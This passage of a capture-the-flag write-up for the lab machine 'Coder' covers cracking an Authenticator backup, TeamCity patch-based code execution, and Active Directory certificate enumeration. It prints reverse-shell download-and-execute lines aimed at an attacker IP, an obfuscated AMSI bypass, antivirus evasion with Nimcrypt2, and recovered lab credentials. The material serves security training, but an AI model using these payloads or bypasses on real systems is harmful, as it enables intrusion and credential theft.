When I used it to generate 2FA codes, added a password to secure it, and extracted the backup file, I received a JSON file with the same format as the one from KeePass database:

```json
{
  "71f716ce-fb03-46b1-95f1-7a24f4628cfa": {
    "encrypted": true,
    "hash": "71f716ce-fb03-46b1-95f1-7a24f4628cfa",
    "index": 1,
    "type": "totp",
    "secret": "U2FsdGVkX182WhikWOheFfTgugI7VpSlZdSNBAlLMEDpqsjus1R1rsDhmGypG8Je7Zw0UuRIr9YxIHpcXgnybA==",
    "issuer": "hub.docker.com",
    "account": "opcode"
  },
  "key": {
    "enc": "U2FsdGVkX1+eI842cvBXeUzL9Mgm6DmSGyLQimT3RG0mUURW2yZp9yFAWC6h83P8NqxzYTT09AZA3YQ77CTlbRi0CBryWuPppION1LfecfhFX0NyYNnuIvPt8WZpRYxg3dNf9wFHxYKGeU1+5GKuZxKPE/7SEIpdTDhrp6ftwTipoYiT0c5y8f5N1/W2+PH8",
    "hash": "$argon2id$v=19$m=16384,t=1,p=1$P74WuHV5KwJiWqO0V8raqw$su+Ptbob0+0/Ieh+fRc84tJLUk1y6vFu"
  }
}
```

We get the encrypted secret only when we use a password on Authenticator.  
Therefore, the work still needs to be done. We also need to recover the password somehow.

The source code for Authenticator is available at <https://github.com/Authenticator-Extension/Authenticator>  
I looked for other functions relevant to backup and found the function `decryptBackupData` in `/src/import.ts`:

```ts
export function decryptBackupData(
  backupData: { [hash: string]: OTPStorage },
  passphrase: string | null
) {
  const decryptedbackupData: { [hash: string]: OTPStorage } = {};
  for (const hash of Object.keys(backupData)) {
    if (typeof backupData[hash] !== "object") {
      continue;
    }
    if (!backupData[hash].secret) {
      continue;
    }
    if (backupData[hash].encrypted && !passphrase) {
      continue;
    }
    if (backupData[hash].encrypted && passphrase) {
      try {
        backupData[hash].secret = CryptoJS.AES.decrypt(
          backupData[hash].secret,
          passphrase
        ).toString(CryptoJS.enc.Utf8);
        backupData[hash].encrypted = false;
      } catch (error) {
        continue;
      }
    }
    // backupData[hash].secret may be empty after decrypt with wrong
    // passphrase
    if (!backupData[hash].secret) {
      continue;
    }
    decryptedbackupData[hash] = backupData[hash];
  }
  return decryptedbackupData;
}
```

The case with passphrase and encrypted data is relevant to us. `AES` from `CryptoJS` is being used.  
The function `decryptedbackupData` is being used in `/src/components/Import/TextImport.vue`:

```ts
        if (key && passphrase) {
          decryptedbackupData = decryptBackupData(
            exportData,
            CryptoJS.AES.decrypt(key.enc, passphrase).toString()
          );
        } else {
          decryptedbackupData = decryptBackupData(exportData, passphrase);
        }
```

In conclusion, the TOTP secret must have been encrypted using a random passphrase to obtain `enc`.  
That random passphrase is further encrypted using the user-provided password to obtain `secret`.  
For my backup file, I had used the password `opcode`. Using it, I was able to recover the TOTP secret:

```ts
const CryptoJS = require("crypto-js");

keyEnc = 'U2FsdGVkX1+eI842cvBXeUzL9Mgm6DmSGyLQimT3RG0mUURW2yZp9yFAWC6h83P8NqxzYTT09AZA3YQ77CTlbRi0CBryWuPppION1LfecfhFX0NyYNnuIvPt8WZpRYxg3dNf9wFHxYKGeU1+5GKuZxKPE/7SEIpdTDhrp6ftwTipoYiT0c5y8f5N1/W2+PH8';
secret = 'U2FsdGVkX182WhikWOheFfTgugI7VpSlZdSNBAlLMEDpqsjus1R1rsDhmGypG8Je7Zw0UuRIr9YxIHpcXgnybA==';
passphrase = 'opcode';

newPassphrase = CryptoJS.AES.decrypt(keyEnc, passphrase).toString();
console.log(`Random Passphrase: ${newPassphrase}`);

data = CryptoJS.AES.decrypt(secret, newPassphrase).toString(CryptoJS.enc.Utf8);
console.log(`TOTP secret: ${data}`);
```

We can get the TOTP secret by running it:

```console
opcode@debian$ bun TOTPsecret.js 
Random Passphrase: 4b9f052a6b893e43bb03b57ee8b236bec6bfdbed72e0e3a92085bcfae20e7b8319b6fff159f4eb190bfe5a040c31e2fa5608813a6bfe22b9926557ae3293bc5c5de9d62a43432580291e53ea1b57b51840e6e40445e0fb3915d0ec198f613bb65174c7a547139c047f74994067edef576e9305b5d58a50fb
TOTP secret: NSOATJGZR6HX4LHLAUIC6WQANQ5TFZUZ
```

I was aware of the password used in the above case. But brute-forcing is needed for the Authenticator backup codes obtained from the KeePass database.  
I'm less comfortable with JavaScript, so I translated the code to Python.  
From past CTFs, I've learnt that `AES` in `crypto-js` uses the weak key derivation function `EVP_BytesToKey`, in which md5 is used by default for digest.
It uses AES-CBC-256 by default, with the default key length and IV length of 32 and 16, respectively.  
Here's a trivia: if you look very closely, you'd find a stray implementation of `EVP_BytesToKey` in the source for `PyCryptodome`.

```py
from json import loads
from base64 import b64decode
from binascii import hexlify
from Crypto.Hash import MD5
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


def EVP_BytesToKey(data, salt, key_len, iv_len):
    d = [b""]
    m = (key_len + iv_len + 15) // 16

    for _ in range(m):
        nd = MD5.new(d[-1] + data + salt).digest()
        d.append(nd)

    d = b"".join(d)

    return d[:key_len], d[key_len : key_len + iv_len]


def decrypt_totp_secret(secret_enc, key_enc, passphrase):
    key_salt = key_enc[8:16]
    key_enc = key_enc[16:]

    aes_key, aes_iv = EVP_BytesToKey(passphrase, key_salt, 32, 16)
    # print(hexlify(aes_key), hexlify(aes_iv))
    cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
    key = cipher.decrypt(key_enc)
    key = unpad(key, 16)
    # print(hexlify(key))

    secret_salt = secret_enc[8:16]
    secret_enc = secret_enc[16:]

    aes_key, aes_iv = EVP_BytesToKey(hexlify(key), secret_salt, 32, 16)
    cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
    secret = cipher.decrypt(secret_enc)
    secret = unpad(secret, 16)

    return secret.decode()


if __name__ == "__main__":
    with open("authenticator.json", "r") as f:
        json_data = loads(f.read())

    with open("/home/opcode/CTF/wordlists/rockyou.txt", "rb") as f:
        wordlist = f.read().split(b"\n")

    key_enc = json_data["key"]["enc"]
    secret_enc = json_data[list(json_data.keys())[0]]["secret"]

    key_enc = b64decode(key_enc)
    secret_enc = b64decode(secret_enc)

    for passphrase in wordlist:
        try:
            secret = decrypt_totp_secret(secret_enc, key_enc, passphrase)
        except ValueError:
            continue
        else:
            print(f"Passphrase: {passphrase.decode()}")
            print(f"TOTP secret: {secret}")
            break
```

I planned to optimize it with multithreading, but the password cracked within 10 seconds on my VM.

```console
opcode@parrot$ python3 key_brute.py
Passphrase: skyblade
TOTP secret: PM2CG6RO73QT74WS
```

I installed the [Authenticator extension](https://addons.mozilla.org/en-US/firefox/addon/auth-helper/) to my browser and chose the option to import a backup file. Using `authenticator.json` with the password `skyblade` worked.  
Afterwards, I logged in to the TeamCity instance with `s.blade:veh5nUSZFFoqz9CrrhSeuwhA` and used the OTP from the extension.  
But the OTP was invalid. I synced the time:

```console
opcode@debian$ sudo ntpdate coder.htb
```

I restarted the browser and retried the OTP from the extension. This time, it worked.

## TeamCity RCE with `Project developer` role

TeamCity is a CI/CD solution, so I expected to either leak a secret or run malicious jobs for RCE.  
Unfortunately, `s.blade` has the default `Project developer` role with limited permissions.  
The [TeamCity Documentation](https://www.jetbrains.com/help/teamcity/2022.10/managing-roles-and-permissions.html#Per-Project+Authorization+Mode) mentions that by default `Project developer` role has the `Customize build parameters` and `Change build source code with a custom patch` permissions. This could give indirect access to altering a configuration/environment per build.

In the `Development_Testing` > `Build_config`, we can requeue the build to run. But we cannot add a new build.  
I referred to <https://github.com/kacperszurek/pentest_teamcity>, and set `env.TEAMCITY_GIT_PATH` to `"C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -command "IWR http://10.10.14.116:8000/Invoke-ConPtyShell.ps1;"` in the `Run Custom Build` menu.  
I tried other variations too, but they didn't work. Most likely, this trick has been patched.

The `Customize build parameters` approach did not work, so I tried the `Change build source code with a custom patch` approach.  
In the `Run Custom Build` menu, if we check the `run as a personal build` option, it asks us to upload a patch in `unified diff` format.

To get `unified diff`, we need to get the current git repository:

```console
opcode@debian$ smbclient //coder.htb/Development -U 'opcode' -N
Try "help" to get a list of possible commands.
smb: \> cd Migrations\teamcity_test_repo
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

```console
opcode@debian$ cat hello_world.ps1
#Simple repo test for Teamcity pipeline
write-host "Hello, World!"
```

I added another line to test for RCE:

```console
opcode@parrot$ git diff > patch.diff
opcode@parrot$ cat patch.diff
```

```diff
diff --git a/hello_world.ps1 b/hello_world.ps1
index 09724d2..863388a 100644
--- a/hello_world.ps1
+++ b/hello_world.ps1
@@ -1,2 +1,3 @@
 #Simple repo test for Teamcity pipeline
 write-host "Hello, World!"
+ping.exe 10.10.14.116
```

After I uploaded the patch and ran the build, I received ping packets.  
To get shell, I used [ConPtyShell](https://github.com/antonioCoco/ConPtyShell):

```diff
diff --git a/hello_world.ps1 b/hello_world.ps1
index 09724d2..e9d52f7 100644
--- a/hello_world.ps1
+++ b/hello_world.ps1
@@ -1,2 +1,3 @@
 #Simple repo test for Teamcity pipeline
 write-host "Hello, World!"
+IEX(IWR http://10.10.14.116:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.116 9001
```

I got a hit on my Python webserver, but I never received a shell. AMSI perhaps blocked it.  
Therefore, I tried using `Invoke-Rabids.ps1`, a slightly modified `ConPtyShell` to evade signature-based detection:

```diff
diff --git a/hello_world.ps1 b/hello_world.ps1
index 09724d2..d081439 100644
--- a/hello_world.ps1
+++ b/hello_world.ps1
@@ -1,2 +1,3 @@
 #Simple repo test for Teamcity pipeline
 write-host "Hello, World!"
+IEX(IWR http://10.10.14.116:8000/Invoke-Rabids.ps1 -UseBasicParsing); Invoke-Rabids 10.10.14.116 9001
```

Finally, I received a shell as `coder\svc_teamcity`, but the shell died after 2 minutes as the build job reached execution timeout.  
I tried spawning another shell from this shell, but both died similarly. It was weird because on Windows, when a parent process dies, it does not affect the child processes.  
Turns out, I was an idiot. I let the countdown reach 2 minutes and let it kill my processes and their kin.  
All I had to do was to kill the parent shell myself, allowing the build to finish gracefully, ensuring the survival of the child shell.
Therefore, we can use `Start-Job` to get a more resilient shell from the first shell:

```console
PS C:\> Start-Job -ScriptBlock { IEX(IWR http://10.10.14.116:8000/Invoke-Rabids.ps1 -UseBasicParsing); Invoke-Rabids 10.10.14.116 9001 }

Id     Name            PSJobTypeName   State         HasMoreData     Location   
--     ----            -------------   -----         -----------     --------   
1      Job1            BackgroundJob   Running       True            localhost  


PS C:\> exit 
```

Now, close the terminal.

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name          SID
================== ============================================== 
coder\svc_teamcity S-1-5-21-2608251805-3526430372-1546376444-5101


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4 
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       668  
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       920  
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2896
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       496
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1112
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1524
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING       1580
  TCP    0.0.0.0:49682          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49683          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING       668
  TCP    0.0.0.0:49689          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49696          0.0.0.0:0              LISTENING       2928
  TCP    0.0.0.0:49745          0.0.0.0:0              LISTENING       3056
  TCP    0.0.0.0:55270          0.0.0.0:0              LISTENING       3028
  TCP    10.10.11.207:53        0.0.0.0:0              LISTENING       3056
  TCP    10.10.11.207:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       3056
  TCP    127.0.0.1:8105         0.0.0.0:0              LISTENING       5268
  TCP    127.0.0.1:8111         0.0.0.0:0              LISTENING       5268
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       764
  TCP    127.0.0.1:32000        0.0.0.0:0              LISTENING       5832
```

We have some new ports, but 8105 and 8111 are relevant to TeamCity. Ports 9090 and 32000 error out with code 400.

```console
PS C:\> qwinsta
No session exists for *
```

```console
PS C:\> Get-Acl -Path C:\inetpub\wwwroot | Format-List


Path   : Microsoft.PowerShell.Core\FileSystem::C:\inetpub\wwwroot 
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : NT AUTHORITY\LOCAL SERVICE Allow  FullControl
         NT AUTHORITY\LOCAL SERVICE Allow  268435456
         NT AUTHORITY\NETWORK SERVICE Allow  FullControl
         NT AUTHORITY\NETWORK SERVICE Allow  268435456
         BUILTIN\IIS_IUSRS Allow  ReadAndExecute, Synchronize
         BUILTIN\IIS_IUSRS Allow  -1610612736
         NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
Audit  :
Sddl   : O:SYG:SYD:AI(A;;FA;;;LS)(A;OICIIO;GA;;;LS)(A;;FA;;;NS)(A;OICIIO;GA;;;NS)(A;;0x1200a9;;;IS)(A;OICIIO;GXGR;;;IS)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;OICIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)
```

Nothing useful here either.

We can try running [adPEAS](https://github.com/61106960/adPEAS) after patching AMSI:

```console
PS C:\Windows\Tasks> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.116:8000/adPEAS.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-adPEAS 
```

It finds a non-default ADCS template:

```text
[!] Template 'Coder-WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT' 
Template Name:                          Coder-WebServer
Template distinguishedname:             CN=Coder-WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb 
Date of Creation:                       11/03/2022 21:15:40
Extended Key Usage:                     Server Authentication
EnrollmentFlag:                         0 
[!] CertificateNameFlag:                ENROLLEE_SUPPLIES_SUBJECT
```

But `ENROLLEE_SUPPLIES_SUBJECT` is not vulnerable on its own.

I also ran `WinPEAS.exe`, but it got blocked by AV. Therefore, I used [Nimcrypt2](https://github.com/icyguider/Nimcrypt2) to bypass Defender:

```console
opcode@debian$ ./nimcrypt -f winPEASany.exe -t csharp -o winpeasobf.exe -s
```

Nothing interesting was present in the output generated by `WinPEAS.exe`

## Recovering `SecureString` from TeamCity diff patches

I asked for a hint and got pointed to `C:\ProgramData\JetBrains\TeamCity\system\changes`

```console
PS C:\ProgramData\JetBrains\TeamCity\system\changes> ls


    Directory: C:\ProgramData\JetBrains\TeamCity\system\changes


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/8/2022   2:18 PM           1707 101.changes.diff
-a----        4/15/2023  12:24 PM            327 201.changes.diff
```

The `201.changes.diff` is mine, but `101.changes.diff` is from a different user:

```console
PS C:\ProgramData\JetBrains\TeamCity\system\changes> cat .\101.changes.diff 
```

```diff
diff --git a/Get-ADCS_Report.ps1 b/Get-ADCS_Report.ps1
index d6515ce..a990b2e 100644
--- a/Get-ADCS_Report.ps1
+++ b/Get-ADCS_Report.ps1
@@ -77,11 +77,15 @@ Function script:send_mail {
     [string]
     $subject
   )
+
+$key = Get-Content ".\key.key"
+$pass = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key)
+$cred = New-Object -TypeName System.Management.Automation.PSCredential ("coder\e.black",$pass)
 $emailFrom = 'pkiadmins@coder.htb'
 $emailCC = 'e.black@coder.htb'
 $emailTo = 'itsupport@coder.htb'
 $smtpServer = 'smtp.coder.htb'
-Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High
+Send-MailMessage -SmtpServer $smtpServer -To $emailTo -Cc $emailCC -From $emailFrom -Subject $subject -Body $message -BodyAsHtml -Priority High -Credential $cred 
 }


diff --git a/enc.txt b/enc.txt
new file mode 100644
index 0000000..d352634
--- /dev/null
+++ b/enc.txt
@@ -0,0 +1,2 @@
+76492d1116743f0423413b16050a5345MgB8AGoANABuADUAMgBwAHQAaQBoAFMAcQB5AGoAeABlAEQAZgBSAFUAaQBGAHcAPQA9AHwANABhADcANABmAGYAYgBiAGYANQAwAGUAYQBkAGMAMQBjADEANAAwADkAOQBmADcAYQBlADkAMwAxADYAMwBjAGYAYwA4AGYAMQA3ADcAMgAxADkAYQAyAGYAYQBlADAAOQA3ADIAYgBmAGQAN
+AA2AGMANQBlAGUAZQBhADEAZgAyAGQANQA3ADIAYwBjAGQAOQA1ADgAYgBjAGIANgBhAGMAZAA4ADYAMgBhADcAYQA0ADEAMgBiAGIAMwA5AGEAMwBhADAAZQBhADUANwBjAGQANQA1AGUAYgA2AGIANQA5AGQAZgBmADIAYwA0ADkAMgAxADAAMAA1ADgAMABhAA==
diff --git a/key.key b/key.key
new file mode 100644
index 0000000..a6285ed
--- /dev/null
+++ b/key.key
@@ -0,0 +1,32 @@
+144
+255
+52
+33
+65
+190
+44
+106
+131
+60
+175
+129
+127
+179
+69
+28
+241
+70
+183
+53
+153
+196
+10
+126
+108
+164
+172
+142
+119
+112
+20
+122
```

We can recover `e.black`'s password:

```console
PS C:\Windows\Tasks> Set-Content enc.txt '76492d1116743f0423413b16050a5345MgB8AGoANABuADUAMgBwAHQAaQBoAFMAcQB5AGoAeABlAEQAZgBSAFUAaQBGAHcAPQA9AHwANABhADcANABmAGYAYgBiAGYANQAwAGUAYQBkAGMAMQBjADEANAAwADkAOQBmADcAYQBlADkAMwAxADYAMwBjAGYAYwA4AGYAMQA3ADcAMgAxADkAYQAyAGYAYQBlADAAOQA3ADIAYgBmAGQANAA2AGMANQBlAGUAZQBhADEAZgAyAGQANQA3ADIAYwBjAGQAOQA1ADgAYgBjAGIANgBhAGMAZAA4ADYAMgBhADcAYQA0ADEAMgBiAGIAMwA5AGEAMwBhADAAZQBhADUANwBjAGQANQA1AGUAYgA2AGIANQA5AGQAZgBmADIAYwA0ADkAMgAxADAAMAA1ADgAMABhAA=='
PS C:\Windows\Tasks> [byte[]] $key = (144,255,52,33,65,190,44,106,131,60,175,129,127,179,69,28,241,70,183,53,153,196,10,126,108,164,172,142,119,112,20,122) 
PS C:\Windows\Tasks> $pass = (Get-Content ".\enc.txt" | ConvertTo-SecureString -Key $key) 
```

Even when `$pass` is `SecureString`, we can recover it in the clear:

```console
PS C:\Windows\Tasks> [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($pass)) 
ypOSJXPqlDOxxbQSfEERy300 
```

Since `e.black` belongs to the `Remote Management Users` group, we can get a WinRM shell:

```console
root@1ca5c756c728:~# nxc winrm 10.10.11.207 -d coder.htb -u 'e.black' -p 'ypOSJXPqlDOxxbQSfEERy300' -X 'IEX(IWR http://10.10.14.116:8000/Invoke-Rabids.ps1 -UseBasicParsing); Invoke-Rabids 10.10.14.116 9001'
```

## Adding vulnerable template to ADCS (ESC5)

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ============================================== 
coder\e.black S-1-5-21-2608251805-3526430372-1546376444-1106 


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CODER\PKI Admins                            Group            S-1-5-21-2608251805-3526430372-1546376444-2101 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

`e.black` belongs to the non-default group `PKI Admins`

```console
PS C:\> net group 'PKI Admins'
Group name     PKI Admins
Comment        ADCS Certificate and Template Management

Members

-------------------------------------------------------------------------------
e.black
The command completed successfully.
```

The comment says members of this group can manage ADCS certificates and templates.  
We can use [certipy](https://github.com/ly4k/Certipy) to look for details:

```console
opcode@debian$ certipy find -u 'e.black' -p 'ypOSJXPqlDOxxbQSfEERy300' -dc-ip 10.10.11.207 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'coder-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'coder-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'coder-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'coder-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : coder-DC01-CA
    DNS Name                            : dc01.coder.htb
    Certificate Subject                 : CN=coder-DC01-CA, DC=coder, DC=htb
    Certificate Serial Number           : 2180F0D10CFECB9840260D0730724BDF
    Certificate Validity Start          : 2022-06-29 03:51:44+00:00
    Certificate Validity End            : 2052-06-29 04:01:44+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CODER.HTB\Administrators
      Access Rights
        ManageCertificates              : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        ManageCa                        : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        Enroll                          : CODER.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates
```

`certipy` is unable to find the vulnerability.  
[Certify](https://github.com/GhostPack/Certify) has an option that still isn't implemented in `certipy`. We can use that.  
But first, we need to use [Nimcrypt2](https://github.com/icyguider/Nimcrypt2) to bypass AV:

```console
opcode@debian$ ./nimcrypt -f Certify.exe -t csharp -o CertifyObf.exe -s
```

Now, we can transfer:

```console
PS C:\Windows\Tasks> iwr 10.10.14.116:8000/CertifyObf.exe -o CertifyObf.exe
PS C:\Windows\Tasks> .\CertifyObf.exe pkiobjects

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find PKI object controllers
[*] Using the search base 'CN=Configuration,DC=coder,DC=htb'

[*] PKI Object Controllers:

    CODER\Administrator (S-1-5-21-2608251805-3526430372-1546376444-500)
        Owner              LDAP://CN=Coder-WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        WriteOwner         LDAP://CN=Coder-WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb

    CODER\Cert Publishers (S-1-5-21-2608251805-3526430372-1546376444-517)
        GenericAll         LDAP://CN=coder-DC01-CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=dc01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=coder-DC01-CA,CN=dc01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb

    CODER\DC01$ (S-1-5-21-2608251805-3526430372-1546376444-1000)
        WriteOwner         LDAP://CN=coder-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=coder-DC01-CA,CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=coder-DC01-CA,CN=dc01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        GenericAll         LDAP://CN=coder-DC01-CA,CN=KRA,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb

    CODER\PKI Admins (S-1-5-21-2608251805-3526430372-1546376444-2101)
        WriteAllProperties LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        WriteAllProperties LDAP://CN=coder-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
        WriteAllProperties LDAP://CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb
```

`PKI Admins` have `WriteAllProperties` privilege over several descendants of `CN=Public Key Services,CN=Services,CN=Configuration,DC=coder,DC=htb`, including `Certificate Templates`. It is one of the various ESC5 scenarios possible.

